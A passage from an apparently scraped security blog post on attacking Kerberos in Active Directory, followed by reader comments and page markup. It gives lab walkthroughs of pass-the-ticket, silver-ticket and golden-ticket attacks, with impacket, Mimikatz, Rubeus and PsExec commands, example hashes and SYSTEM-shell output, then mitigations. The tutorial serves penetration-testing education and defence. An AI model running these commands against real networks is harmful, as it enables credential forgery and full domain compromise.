::FromBase64String(\"doIFADCCBPygAwIBBaEDAgEWooIEBjCCBAJhggP+MIID+qADAgEFoQ8bDUpVUkFTU0lDLlBBUkuiIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDUpVUkFTU0lDLlBBUkujggO8MIIDuKADAgESoQMCAQKiggOqBIIDpp9Nm0OTu82mrTl0Tekr8KEF3eX23qxHKcryCuzDV\/PdwUNpSc+1Oxa0k2WWvZwa+H9DW4I8fr0BE7oHMs6GaNFEjDJdO\/l0qGUlCwyha05+9lg832SDEERgAA1wQDLjPogyBBTrP5OhGmf0JevqulePfTUSxXJ\/gNvP6JCQGAf+zUL12dqGkqyq\/\/TOWSQjkgAy3NZtc1Ed3XnfI9L4VUo9YdY5fVSEci7kRm6Mk11sTV7bXSzd4123fXLA3Usx+xJVKh5JPhvtSyDKRDNdcP2YKPoTyEuKUpsl8KhzbkEpdLPqzR+2uLHNmMzWDdsxTlytzZF9kzB9llUB2C9YLgzDQkrx4\/EIDH9w3u3pVVgAmZp1Y9sQhVmI9exIYVSPM\/XA8vPAL1KDGyux+ojkVDAl\/Kezqg6DWtLZO86Rpb7L7LRvk8jX\/4Y4Yi0TMlsZjahwXn1N3ZulUiF7pvYzh9es9MkS\/X\/YqF6CiDogblLEaFniMYWNYFYMmhjfIZHgX3lyIj8UljRwdeFdt7Ezf\/pmP1rl5uONhMlagv+prw4UcvN2u4Yeb+ybXMisMH4xonJIBr7\/MKEhmbHVmKuoT+LBMjfN7iChY82rPqbKW0J+nn4yvC3zjLlOC5HNSTdMgGV5FSAY34RO3SCOe14jetHmq9OQ5rLO5ymWfet5jcYy+ShtrYoNTxEPodNZyFqrBDT4JZ6T9jgoYMIu+g3VcoCRN5XDUJM+tBzZ6QUu91D0ULl3wdvbEhh89hPAy1AHEWLtAth55\/CJ0kNpWLPvLLz34OLzNg8nzCG2x9mFVP4MKvUw4JJN3LSkYRrxIg5eehSuQul43ZqQhxi\/+OyRoVwSfqqMeYO2QSeADaIiaFTwWaIDAu0pr1Vk+XfJGuHUWBjRocHu3dasPMhGoRlV5ehHxc58gnJ6UzkfcVDV7j1Skn7eos6wa6ejFOrMKNSB+cBqBcvBMCCksHsnQSd4gxUiw\/7Masc9M+f9Xi3vf+f0LyiSKDdUIDOekMh\/RqQhGs9UKSjp6\/Q7EhMCd90JUDGbwBQZhTOBZApdo1VQ609kXfv654RSZ1OzSgaaK6P0GJdJGJ5NGIuNl1n0oEOZVB0FfATLH\/xC9uD97VkH2mQ8jnFHHxseUle2qMhkG+NsLOD7c2c9pzUNEbc4EZEjwMFx4eJwEeLnpXOMOMS6ix1YMuZjof6Q8xNmq05vpNMAOScgV7d3QmMvJLNy6LB6gBKPPBqG4kCjgeUwgeKgAwIBAKKB2gSB132B1DCB0aCBzjCByzCByKArMCmgAwIBEqEiBCDWCiR7AsN2CoCc3drUo1HXmrcZpkzd27J2Mt9vTfsou6EPGw1KVVJBU1NJQy5QQVJLohEwD6ADAgEBoQgwBhsEdHJleKMHAwUAQOAAAKURGA8yMDE5MDMwNzE1MjgyM1qmERgPMjAxOTAzMDgwMTI4MjNapxEYDzIwMTkwMzE0MTUyODIzWqgPGw1KVVJBU1NJQy5QQVJLqSIwIKADAgECoRkwFxsGa3JidGd0Gw1KVVJBU1NJQy5QQVJL\"))    And finally, after executing any of those tools, tickets are dumped, ready to use except for those expired.  Swaping Linux and Windows tickets between platforms  Before start using the tickets, it is important to have them in the proper format, due to Windows and Linux using different approaches to save them. In order to convert from ccache (Linux file format) to kirbi (Windows file format used by Mimikatz and Rubeus), and vice versa, the following tools can be used:     \tThe ticket_converter script. The only needed parameters are the current ticket and the output file, it automatically detects the input ticket file format and converts it. For example:    root@kali:ticket_converter# python ticket_converter.py velociraptor.ccache velociraptor.kirbi  Converting ccache &gt; kirbi  root@kali:ticket_converter# python ticket_converter.py velociraptor.kirbi velociraptor.ccache  Converting kirbi &gt; ccache       \tKekeo, to convert them in Windows. This tool was not checked due to requiring a license in their ASN1 library, but I think it is worth mentioning.    From Linux  To perform the pass the ticket attack by using psexec.py from impacket, just do the following:  root@kali:impacket-examples# export KRB5CCNAME\/root\/impacket-examples\/krb5cc_1120601113_ZFxZpK   root@kali:impacket-examples# python psexec.py jurassic.park\/trex@labwws02.jurassic.park -k -no-pass  Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation     Requesting shares on labwws02.jurassic.park.....   Found writable share ADMIN$   Uploading file SptvdLDZ.exe   Opening SVCManager on labwws02.jurassic.park.....   Creating service zkNG on labwws02.jurassic.park.....   Starting service zkNG.....   Press help for extra shell commands  Microsoft Windows   Copyright (c) 2009 Microsoft Corporation. All rights reserved.    C:\\Windows\\system32&gt;whoami  nt authority\\system    C:\\Windows\\system32&gt;      As with PTK attacks, in order to use a ticket with any impacket tool, just specify the KRB5CCNAME environment variable and the -no-pass -k parameters.    While performing this technique, an error was shown by impacket:  SMB SessionError: STATUS_ACCESS_DENIED..., even if the user had access to the remote machine. This issue was caused by the fact that a ticket without the A flag (pre-authenticated) was used, because that domain user did not need Kerberos pre-authentication. To check ticket flags in Linux, the command klist -f  can be used, which is part of the krb5 package. Example:  root@kali:impacket-examples# klist -f -c krb5cc_1120601113_ZFxZpK  Ticket cache: FILE:krb5cc_1120601113_ZFxZpK  Default principal: velociraptor@JURASSIC.PARK    Valid starting     Expires            Service principal  03\/07\/19 11:08:45  03\/07\/19 21:08:45  krbtgt\/JURASSIC.PARK@JURASSIC.PARK  \trenew until 03\/08\/19 11:08:41, Flags: RIA    From Windows  In a Windows machine, Rubeus or Mimikatz can be used in order to inject tickets in the current session, no special privileges are required to accomplish this task. After that, it is possible to use a tool like PsExec to execute commands in remote machines as the new user. Example executions of both tools are shown below:    Mimikatz example:  PS C:\\Users\\velociraptor&gt; .\\mimikatz.exe      .#####.   mimikatz 2.1.1 (x64) built on Mar 18 2018 00:21:25   .## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)   ## \/ \\ ##  \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )   ## \\ \/ ##       &gt; https:\/\/blog.gentilkiwi.com\/mimikatz   '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )    '#####'        &gt; https:\/\/pingcastle.com \/ https:\/\/mysmartlogon.com   ***\/    mimikatz # kerberos::ptt -2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi    * File: '-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi': OK    mimikatz # exit  Bye!  PS C:\\Users\\velociraptor&gt; klist    Current LogonId is 0:0x34f9571    Cached Tickets: (1)    #0&gt;     Client: trex @ JURASSIC.PARK          Server: krbtgt\/JURASSIC.PARK @ JURASSIC.PARK          KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96          Ticket Flags 0x40e00000 -&gt; forwardable renewable initial pre_authent          Start Time: 3\/5\/2019 9:15:59 (local)          End Time:   3\/5\/2019 19:15:59 (local)          Renew Time: 3\/7\/2019 12:14:43 (local)          Session Key Type: AES-256-CTS-HMAC-SHA1-96    PS C:\\Users\\velociraptor&gt; .\\PsExec.exe -accepteula \\\\lab-wdc01.jurassic.park cmd    PsExec v2.2 - Execute processes remotely  Copyright (C) 2001-2016 Mark Russinovich  Sysinternals - www.sysinternals.com      Microsoft Windows   Copyright (c) 2009 Microsoft Corporation.  All rights reserved.    C:\\Windows\\system32&gt;whoami  jurassic\\trex    C:\\Windows\\system32&gt;    Rubeus example:  C:\\Users\\velociraptor&gt;.\\Rubeus.exe ptt \/ticket:-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi       ______        _    (_____ \\      | |     _____) )_   _| |__  _____ _   _  ___    |  __  \/| | | |  _ \\| ___ | | | |\/___)    | |  \\ \\| |_| | |_) ) ____| |_| |___ |    |_|   |_|____\/|____\/|_____)____\/(___\/      v1.3.3       Action: Import Ticket   Ticket successfully imported!    C:\\Users\\velociraptor&gt;klist    Current LogonId is 0:0x34f958e    Cached Tickets: (1)    #0&gt;     Client: trex @ JURASSIC.PARK          Server: krbtgt\/JURASSIC.PARK @ JURASSIC.PARK          KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96          Ticket Flags 0x40e00000 -&gt; forwardable renewable initial pre_authent          Start Time: 3\/5\/2019 9:15:59 (local)          End Time:   3\/5\/2019 19:15:59 (local)          Renew Time: 3\/7\/2019 12:14:43 (local)          Session Key Type: AES-256-CTS-HMAC-SHA1-96      C:\\Users\\velociraptor&gt;.\\PsExec.exe -accepteula \\\\lab-wdc01.jurassic.park cmd    PsExec v2.2 - Execute processes remotely  Copyright (C) 2001-2016 Mark Russinovich  Sysinternals - www.sysinternals.com      Microsoft Windows   Copyright (c) 2009 Microsoft Corporation.  All rights reserved.    C:\\Windows\\system32&gt;whoami  jurassic\\trex    C:\\Windows\\system32&gt;    After injecting the ticket of a user account, it is possible to act on behalf of that user in remote machines, but not in the local one, where Kerberos doesn't apply. Remember that TGT tickets are more useful than TGS ones, as they are not restricted to one service only.      Silver ticket  The Silver ticket attack is based on crafting a valid TGS for a service once the NTLM hash of a user account is owned. Thus, it is possible to gain access to that service by forging a custom TGS with the maximum privileges inside it.    In this case, the NTLM hash of a computer account (which is kind of a user account in AD) is owned. Hence, it is possible to craft a ticket in order to get into that machine with administrator privileges through the SMB service.    It also must be taken into account that it is possible to forge tickets using the AES Kerberos keys (AES128 and AES256), which are calculated from the password as well, and can be used by Impacket and Mimikatz to craft the tickets. Moreover, these keys, unlike the NTLM hash, are salted with the domain and username. In order to know more about how this keys are calculated, it is recommended to read the section 4.4 of MS-KILE or the Get-KerberosAESKey.ps1 script.  From Linux  As usual, it is possible to perform these attacks from a Linux machine by using the examples provided by impacket. In this case ticketer.py is used to forge a TGS:  root@kali:impacket-examples# python ticketer.py -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park -spn cifs\/labwws02.jurassic.park  stegosaurus  Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation     Creating basic skeleton ticket and PAC Infos   Customizing ticket for jurassic.park\/stegosaurus   \tPAC_LOGON_INFO   \tPAC_CLIENT_INFO_TYPE   \tEncTicketPart   \tEncTGSRepPart   Signing\/Encrypting final ticket   \tPAC_SERVER_CHECKSUM   \tPAC_PRIVSVR_CHECKSUM   \tEncTicketPart   \tEncTGSRepPart   Saving ticket in stegosaurus.ccache  root@kali:impacket-examples# export KRB5CCNAME\/root\/impacket-examples\/stegosaurus.ccache   root@kali:impacket-examples# python psexec.py jurassic.park\/stegosaurus@labwws02.jurassic.park -k -no-pass  Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation     Requesting shares on labwws02.jurassic.park.....   Found writable share ADMIN$   Uploading file JhRQHMnu.exe   Opening SVCManager on labwws02.jurassic.park.....   Creating service Drvl on labwws02.jurassic.park.....   Starting service Drvl.....   Press help for extra shell commands  Microsoft Windows   Copyright (c) 2009 Microsoft Corporation. All rights reserved.    C:\\Windows\\system32&gt;whoami  nt authority\\system    C:\\Windows\\system32&gt;    Execution is similar to PTT attacks, but in this case the ticket is created manually. After that, as usual, it is possible to set the ticket in the KRB5CCNAME environment variable and use it with the -no-pass -k parameters in any of the impacket examples.  From Windows  In Windows, Mimikatz can be used to craft the ticket. Next, the ticket is injected with Rubeus, and finally a remote shell can be obtained thanks to PsExec. It must be taken into account that tickets can be forged in a local machine, which is not in the target network, and after that send it to a machine in the network to inject it. An execution example is shown below:  C:\\Users\\triceratops&gt;.\\mimikatz.exe      .#####.   mimikatz 2.1.1 (x64) built on Mar 18 2018 00:21:25   .## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)   ## \/ \\ ##  \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )   ## \\ \/ ##       &gt; https:\/\/blog.gentilkiwi.com\/mimikatz   '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )    '#####'        &gt; https:\/\/pingcastle.com \/ https:\/\/mysmartlogon.com   ***\/    mimikatz # kerberos::golden \/domain:jurassic.park \/sid:S-1-5-21-1339291983-1349129144-367733775 \/rc4:b18b4b218eccad1c223306ea1916885f \/user:stegosaurus \/service:cifs \/target:labwws02.jurassic.park  User      : stegosaurus  Domain    : jurassic.park (JURASSIC)  SID       : S-1-5-21-1339291983-1349129144-367733775  User Id   : 500  Groups Id : *513 512 520 518 519  ServiceKey: b18b4b218eccad1c223306ea1916885f - rc4_hmac_nt  Service   : cifs  Target    : labwws02.jurassic.park  Lifetime  : 28\/02\/2019 13:42:05 ; 25\/02\/2029 13:42:05 ; 25\/02\/2029 13:42:05  -&gt; Ticket : ticket.kirbi     * PAC generated   * PAC signed   * EncTicketPart generated   * EncTicketPart encrypted   * KrbCred generated    Final Ticket Saved to file !    mimikatz # exit  Bye!  C:\\Users\\triceratops&gt;.\\Rubeus.exe ptt \/ticket:ticket.kirbi       ______        _    (_____ \\      | |     _____) )_   _| |__  _____ _   _  ___    |  __  \/| | | |  _ \\| ___ | | | |\/___)    | |  \\ \\| |_| | |_) ) ____| |_| |___ |    |_|   |_|____\/|____\/|_____)____\/(___\/      v1.3.3       Action: Import Ticket   Ticket successfully imported!    C:\\Users\\triceratops&gt;.\\PsExec.exe -accepteula \\\\labwws02.jurassic.park cmd    PsExec v2.2 - Execute processes remotely  Copyright (C) 2001-2016 Mark Russinovich  Sysinternals - www.sysinternals.com      Microsoft Windows   Copyright (c) 2009 Microsoft Corporation. All rights reserved.    C:\\Windows\\system32&gt;whoami  jurassic\\stegosaurus    C:\\Windows\\system32&gt;    Additionally, the Mimikatz module kerberos::ptt can be used to inject the ticket instead of using Rubeus, as shown in the PTT attack section.      Golden ticket  The Golden ticket technique is similar to the Silver ticket one, however, in this case a TGT is crafted by using the NTLM hash of the krbtgt AD account. The advantage of forging a TGT instead of TGS is being able to access any service (or machine) in the domain.    The krbtgt account NTLM hash can be obtained from the lsass process or the NTDS.dit file of any DC in the domain. It is also possible to get that NTLM through a DCsync attack, which can be performed either with the lsadump::dcsync module of Mimikatz or the impacket example secretsdump.py. Usually, domain admin privileges or similar are required, no matter what technique is used.  From Linux  The way to forge a Golden Ticket is very similar to the Silver Ticket one. The main differences are that, in this case, no service SPN must be specified to ticketer.py, and the krbtgt ntlm hash must be used:  root@kali:impacket-examples# python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus  Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation     Creating basic skeleton ticket and PAC Infos   Customizing ticket for jurassic.park\/stegosaurus   \tPAC_LOGON_INFO   \tPAC_CLIENT_INFO_TYPE   \tEncTicketPart   \tEncAsRepPart   Signing\/Encrypting final ticket   \tPAC_SERVER_CHECKSUM   \tPAC_PRIVSVR_CHECKSUM   \tEncTicketPart   \tEncASRepPart   Saving ticket in stegosaurus.ccache  root@kali:impacket-examples# export KRB5CCNAME\/root\/impacket-examples\/stegosaurus.ccache  root@kali:impacket-examples# python psexec.py jurassic.park\/stegosaurus@lab-wdc02.jurassic.park -k -no-pass  Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation     Requesting shares on lab-wdc02.jurassic.park.....   Found writable share ADMIN$   Uploading file goPntOCB.exe   Opening SVCManager on lab-wdc02.jurassic.park.....   Creating service DMmI on lab-wdc02.jurassic.park.....   Starting service DMmI.....   Press help for extra shell commands  Microsoft Windows   (c) 2013 Microsoft Corporation. All rights reserved.    C:\\Windows\\system32&gt;whoami  nt authority\\system    C:\\Windows\\system32&gt;    The result is similar to the Silver Ticket one, but this time, the compromised server is the DC, and could be any machine or the domain.  From Windows  As in silver ticket case, Mimikatz, Rubeus and PsExec can be used to launch the attack:  C:\\Users\\triceratops&gt;.\\mimikatz.exe      .#####.   mimikatz 2.1.1 (x64) built on Mar 18 2018 00:21:25   .## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)   ## \/ \\ ##  \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )   ## \\ \/ ##       &gt; https:\/\/blog.gentilkiwi.com\/mimikatz   '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )    '#####'        &gt; https:\/\/pingcastle.com \/ https:\/\/mysmartlogon.com   ***\/    mimikatz # kerberos::golden \/domain:jurassic.park \/sid:S-1-5-21-1339291983-1349129144-367733775 \/rc4:25b2076cda3bfd6209161a6c78a69c1c \/user:stegosaurus  User      : stegosaurus  Domain    : jurassic.park (JURASSIC)  SID       : S-1-5-21-1339291983-1349129144-367733775  User Id   : 500  Groups Id : *513 512 520 518 519  ServiceKey: 25b2076cda3bfd6209161a6c78a69c1c - rc4_hmac_nt  Lifetime  : 28\/02\/2019 10:58:03 ; 25\/02\/2029 10:58:03 ; 25\/02\/2029 10:58:03  -&gt; Ticket : ticket.kirbi     * PAC generated   * PAC signed   * EncTicketPart generated   * EncTicketPart encrypted   * KrbCred generated    Final Ticket Saved to file !    mimikatz # exit  Bye!  C:\\Users\\triceratops&gt;.\\Rubeus.exe ptt \/ticket:ticket.kirbi       ______        _    (_____ \\      | |     _____) )_   _| |__  _____ _   _  ___    |  __  \/| | | |  _ \\| ___ | | | |\/___)    | |  \\ \\| |_| | |_) ) ____| |_| |___ |    |_|   |_|____\/|____\/|_____)____\/(___\/      v1.3.3       Action: Import Ticket   Ticket successfully imported!    C:\\Users\\triceratops&gt;klist    Current LogonId is 0:0x50ca688    Cached Tickets: (1)    #0&gt;     Client: stegosaurus @ jurassic.park          Server: krbtgt\/jurassic.park @ jurassic.park          KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)          Ticket Flags 0x40e00000 -&gt; forwardable renewable initial pre_authent          Start Time: 2\/28\/2019 11:36:55 (local)          End Time:   2\/25\/2029 11:36:55 (local)          Renew Time: 2\/25\/2029 11:36:55 (local)          Session Key Type: RSADSI RC4-HMAC(NT)          Cache Flags: 0x1 -&gt; PRIMARY          Kdc Called:    C:\\Users\\triceratops&gt;.\\PsExec.exe -accepteula \\\\lab-wdc02.jurassic.park cmd    PsExec v2.2 - Execute processes remotely  Copyright (C) 2001-2016 Mark Russinovich  Sysinternals - www.sysinternals.com      Microsoft Windows   (c) 2013 Microsoft Corporation. All rights reserved.    C:\\Windows\\system32&gt;whoami  jurassic\\stegosaurus    C:\\Windows\\system32&gt;    While I was performing this technique, sometimes seems that tickets doesn't work. I was wondering what is happening, when I remembered reading this post about the 20 minute rule for PAC validation in the DC. Then I realized that any of the failed ticket were injected after I having been performing some unrelated tasks, which it involves that between the moment I created the ticket and the moment I injected it, at least half an hour had passed. So, remember to inject the tickets after creating them.      Mitigations  In order to prevent or mitigate many of these Kerberos attacks a series of policies can be implemented. Some examples are the following:     \tEnable an strong password policy: First step is to avoid having weak passwords in domain user accounts. To achieve this an strong password policy should be implemented, by ensuring that complex password option is enabled on Active Directory domain. Moreover, blacklisting some common predictable terms in passwords as company names, year or months names.   \tAvoid accounts without pre-authentication: If it is no completely necessary, none account must have Kerberos pre-authentication enabled. In case that this cannot be avoided, take note of these special accounts and create pseudo-random passwords with high level of complexity.   \tAvoid executing services in behalf of account accounts: Avoid services that run in domain user account context. In case of using an special user account for launch domain services, generate an strong pseudo-random password for that account.   \tVerify PAC: Enable PAC verification in order to avoid attacks such as Silver Ticket. To enable this check set the value ValidateKdcPacSignature (DWORD) in subkey HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Kerberos\\Parameters to 1.   \tChange passwords periodically: Set policies to ensure that user passwords are periodically modified, for example, each 2 to 4 months. As special case, krbtgt account password should also be changed periodically, since that key is used to create TGTs. To this purpose, the script https:\/\/gallery.technet.microsoft.com\/Reset-the-krbtgt-account-581a9e51 can be used. It must be taken into account that krbtgt password must be modified twice to invalidate current domain tickets, for cache reasons. Another consideration is that the functional level of domain must be equal or higher than Windows Server 2008 in order to manipulate krbtgt account credentials.   \tDisable Kerberos weak encryption types: Only Kerberos encryption with AES keys should be allowed. Furthermore, Kerberos requests with a lower level of encryption as RC4 should be monitored, due is usually used by attack tools.    Additionally, Microsoft has published a guide which explains more detailed ways of preventing and mitigations this sort of attacks. It can be downloaded at https:\/\/www.microsoft.com\/en-us\/download\/details.aspx?id36036.      Conclussion  As it has already been shown, Kerberos has an enormous attack surface that can be used by possible attackers. Therefore, it is necessary to be aware of these attack techniques in order to deploy a set of security policies that avoid and mitigate them.    However, the journey is not over yet. Until now, only direct attacks have been seen, and there is a Kerberos feature that allows to expand its surface: Delegation.    Therefore, the next post of this series will try to explain this feature and how it can be abused to steal and compromise domain accounts.      References     \tMS-KILE: https:\/\/docs.microsoft.com\/en-us\/openspecs\/windows_protocols\/ms-kile\/2a32282e-dd48-4ad9-a542-609804b02cc9   \tImpacket: https:\/\/github.com\/SecureAuthCorp\/impacket   \tMimikatz: https:\/\/github.com\/gentilkiwi\/mimikatz   \tRubeus: https:\/\/github.com\/GhostPack\/Rubeus   \tInvoke-Kerberoast: https:\/\/github.com\/EmpireProject\/Empire\/blob\/master\/data\/module_source\/credentials\/Invoke-Kerberoast.ps1   \tKerbrute.py: https:\/\/github.com\/TarlogicSecurity\/kerbrute   \tticket_converter.py: https:\/\/github.com\/Zer1t0\/ticket_converter   \tTickey: https:\/\/github.com\/TarlogicSecurity\/tickey   \tKerberos Credential Thievery (GNU\/Linux): https:\/\/www.delaat.net\/rp\/2016-2017\/p97\/report.pdf   \tFun with LDAP and Kerberos in AD environments: https:\/\/speakerdeck.com\/ropnop\/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide79   \t20 Minute Rule PAC: https:\/\/passing-the-hash.blogspot.com.es\/2014\/09\/pac-validation-20-minute-rule-and.html   \tMimikatz and your credentials: https:\/\/www.nosuchcon.org\/talks\/2014\/D2_02_Benjamin_Delpy_Mimikatz.pdf   \tMIT Kerberos Credential cache types: https:\/\/web.mit.edu\/kerberos\/krb5-devel\/doc\/basic\/ccache_def.html   \tMIT Kerberos File ccache format: https:\/\/web.mit.edu\/kerberos\/krb5-devel\/doc\/formats\/ccache_file_format.html   \tDetecting Kerberoasting: https:\/\/adsecurity.org\/?p3458    Discover our work and\u00a0cybersecurity services\u00a0at\u00a0www.tarlogic.com    In\u00a0TarlogicTeo\u00a0and\u00a0TarlogicMadrid.    ","keywords":"hacking, How to attack Kerberos, Kerberos, kerberos attack, ","datePublished":"2019-06-04T11:26:55+02:00","dateModified":"2021-12-20T00:28:33+01:00","author":{"@type":"Person","name":"Eloy P\u00e9rez","description":"","url":"https:\/\/www.tarlogic.com\/blog\/author\/eloy-pereztarlogic-com\/","sameAs":[],"image":{"@type":"ImageObject","url":"https:\/\/secure.gravatar.com\/avatar\/aef78b0d8eb6bff91accf3fb03a9934b?s=96&d=mm&r=g","height":96,"width":96}},"editor":{"@type":"Person","name":"Eloy P\u00e9rez","description":"","url":"https:\/\/www.tarlogic.com\/blog\/author\/eloy-pereztarlogic-com\/","sameAs":[],"image":{"@type":"ImageObject","url":"https:\/\/secure.gravatar.com\/avatar\/aef78b0d8eb6bff91accf3fb03a9934b?s=96&d=mm&r=g","height":96,"width":96}},"publisher":{"@type":"Organization","name":"Tarlogic Security \u2013 Cyber Security and Ethical hacking","url":"https:\/\/www.tarlogic.com","logo":{"@type":"ImageObject","url":"https:\/\/www.tarlogic.com\/wp-content\/uploads\/2016\/12\/LOGOTIPO_TARLOGIC_WEB.png","width":"239","height":"60"}},"comment":[{"@type":"Comment","id":"https:\/\/www.tarlogic.com\/blog\/how-to-attack-kerberos\/comment-51525","dateCreated":"2020-03-12T04:34:22+01:00","description":"Excellent article! Great job of organizing all this data in an easy to read format!","upvoteCount":0,"downvoteCount":0,"author":{"@type":"Person","name":"Jorko: Wonderchimp","url":""}},{"@type":"Comment","id":"https:\/\/www.tarlogic.com\/blog\/how-to-attack-kerberos\/comment-31239","dateCreated":"2020-02-12T17:19:01+01:00","description":"Thanks for sharing  Active directory auditor tips.  for more info i rfer cion systems  Active directory auditor in USA.","upvoteCount":0,"downvoteCount":0,"author":{"@type":"Person","name":"cionsystems","url":""}},{"@type":"Comment","id":"https:\/\/www.tarlogic.com\/blog\/how-to-attack-kerberos\/comment-23707","dateCreated":"2019-06-07T08:28:08+02:00","description":"Hi, thats an excellent question because that command could be a little confusing, however it is not a mistake. Mimikatz uses the same command (kerberos::golden) to generate silver and golden tickets. It generates an TGS or TGT based on the arguments provided, more specifically, if you provide the service parameter, then a TGS will be generated. There is more information in https:\/\/github.com\/gentilkiwi\/mimikatz\/wiki\/module-~-kerberos#golden--silver.","upvoteCount":0,"downvoteCount":0,"author":{"@type":"Person","name":"Eloy P\u00e9rez","url":""}},{"@type":"Comment","id":"https:\/\/www.tarlogic.com\/blog\/how-to-attack-kerberos\/comment-23704","dateCreated":"2019-06-07T05:12:31+02:00","description":"HiIt looks like the Mimikatz for Windows for Siverticket was accidentally replace with the Golden ticket procedure. Is that right? Or am I missing something?","upvoteCount":0,"downvoteCount":0,"author":{"@type":"Person","name":"Jesse","url":""}},{"@type":"Comment","id":"https:\/\/www.tarlogic.com\/blog\/how-to-attack-kerberos\/comment-23651","dateCreated":"2019-06-04T16:29:02+02:00","description":"great reading!!!!!!! thank you for sharing!","upvoteCount":0,"downvoteCount":0,"author":{"@type":"Person","name":"Smokey","url":""}}],"image":[{"@type":"ImageObject","@id":"https:\/\/www.tarlogic.com\/blog\/how-to-attack-kerberos\/#primaryimage","url":"https:\/\/www.tarlogic.com\/wp-content\/uploads\/2019\/06\/kerberosII-1200x708.png","width":"1200","height":"708"},{"@type":"ImageObject","url":"https:\/\/www.tarlogic.com\/wp-content\/uploads\/2019\/06\/kerberosII-1200x900.png","width":"1200","height":"900"},{"@type":"ImageObject","url":"https:\/\/www.tarlogic.com\/wp-content\/uploads\/2019\/06\/kerberosII-1200x675.png","width":"1200","height":"675"}]}]
</script>
<link rel="amphtml" href="https://www.tarlogic.com/blog/how-to-attack-kerberos/amp/"> <script type="text/javascript">
			var doc = document.documentElement;
			doc.setAttribute( 'data-useragent', navigator.userAgent );
		</script>
<noscript><style id="rocket-lazyload-nojs-css">.rll-youtube-player, [data-lazy-src]{display:none !important;}</style></noscript>
<script type="text/javascript">
    var doc = document.documentElement;
    doc.setAttribute('data-useragent', navigator.userAgent);
  </script>
<script>
    var idioma = 'en';
  </script>
</head>
<body class="post-template-default single single-post postid-19268 single-format-standard fusion-image-hovers fusion-pagination-sizing fusion-button_size-large fusion-button_type-flat fusion-button_span-no avada-image-rollover-circle-yes avada-image-rollover-yes avada-image-rollover-direction-left fusion-body ltr fusion-sticky-header no-mobile-slidingbar fusion-disable-outline fusion-sub-menu-fade mobile-logo-pos-left layout-wide-mode avada-has-boxed-modal-shadow-none layout-scroll-offset-full avada-has-zero-margin-offset-top fusion-top-header menu-text-align-center mobile-menu-design-modern fusion-show-pagination-text fusion-header-layout-v3 avada-responsive avada-footer-fx-none avada-menu-highlight-style-bar fusion-search-form-classic fusion-main-menu-search-dropdown fusion-avatar-square avada-sticky-shrinkage avada-blog-layout-grid avada-blog-archive-layout-grid avada-header-shadow-no avada-menu-icon-position-left avada-has-megamenu-shadow avada-has-mainmenu-dropdown-divider avada-has-breadcrumb-mobile-hidden avada-has-titlebar-bar_and_content avada-has-pagination-padding avada-flyout-menu-direction-fade avada-ec-views-v1">
<header class="header">
<div class="header__bars">
<div class="bar_top">
<div class="tar_wrapper tar_wrapper--menu">
<div class="lang_sel_list_horizontal wpml-ls-statics-shortcode_actions wpml-ls wpml-ls-legacy-list-horizontal" id="lang_sel_list">
<ul><li class="icl-es wpml-ls-slot-shortcode_actions wpml-ls-item wpml-ls-item-es wpml-ls-first-item wpml-ls-item-legacy-list-horizontal">
<a href="https://www.tarlogic.com/es/blog/como-atacar-kerberos/" class="wpml-ls-link"><span class="wpml-ls-display icl_lang_sel_translated">ES</span></a>
</li><li class="icl-en wpml-ls-slot-shortcode_actions wpml-ls-item wpml-ls-item-en wpml-ls-current-language wpml-ls-last-item wpml-ls-item-legacy-list-horizontal">
<a href="https://www.tarlogic.com/blog/how-to-attack-kerberos/" class="wpml-ls-link"><span class="wpml-ls-native icl_lang_sel_native">EN</span></a>
</li></ul>
</div> </div>
</div>
<div class="bar_menu">
<div class="tar_wrapper tar_wrapper--menu">
<a href="https://www.tarlogic.com" class="bar_menu__logo">
<svg xmlns="https://www.w3.org/2000/svg" width="234.414" height="85.941" viewBox="0 0 234.414 85.941">
<g id="logo_tarlogic" transform="translate(-6607.973 -1591.521)">
<path id="logo_trazado1" d="M6631.7,1593.145v17.087l-23.184,19.34v-15.241Z" transform="translate(0 -0.49)" fill="none" stroke="#fff" stroke-width="1"></path>
<path d="M6656.361,1620.785l-24.191-20.208v-.007l0,0,0,0v.007l-24.19,20.208,9.79,3.584,14.405-12.033,14.217,12.1Z" transform="translate(0 9.359)" fill="#00bfb3"></path>
<g id="logo_trazado3" transform="translate(3.511 15.46)" fill="none">
<path d="M6628.657,1606.137V1662l-18.169-40.542Z" stroke="none"></path>
<path d="M 6627.65673828125 1608.288452148438 L 6611.7080078125 1621.738403320313 L 6627.65673828125 1657.324829101563 L 6627.65673828125 1608.288452148438 M 6628.65673828125 1606.136962890625 L 6628.65673828125 1662.001220703125 L 6610.4873046875 1621.459716796875 L 6628.65673828125 1606.136962890625 Z" stroke="none" fill="#fff"></path>
</g>
<g id="Letras" transform="translate(6668.482 1616.902)" fill="#00bfb3">
<path d="M6635.342,1603.724h18.609v6.173h-6.266v17.47h-6.2V1609.9h-6.143Z" transform="translate(-6635.342 -1603.724)"></path>
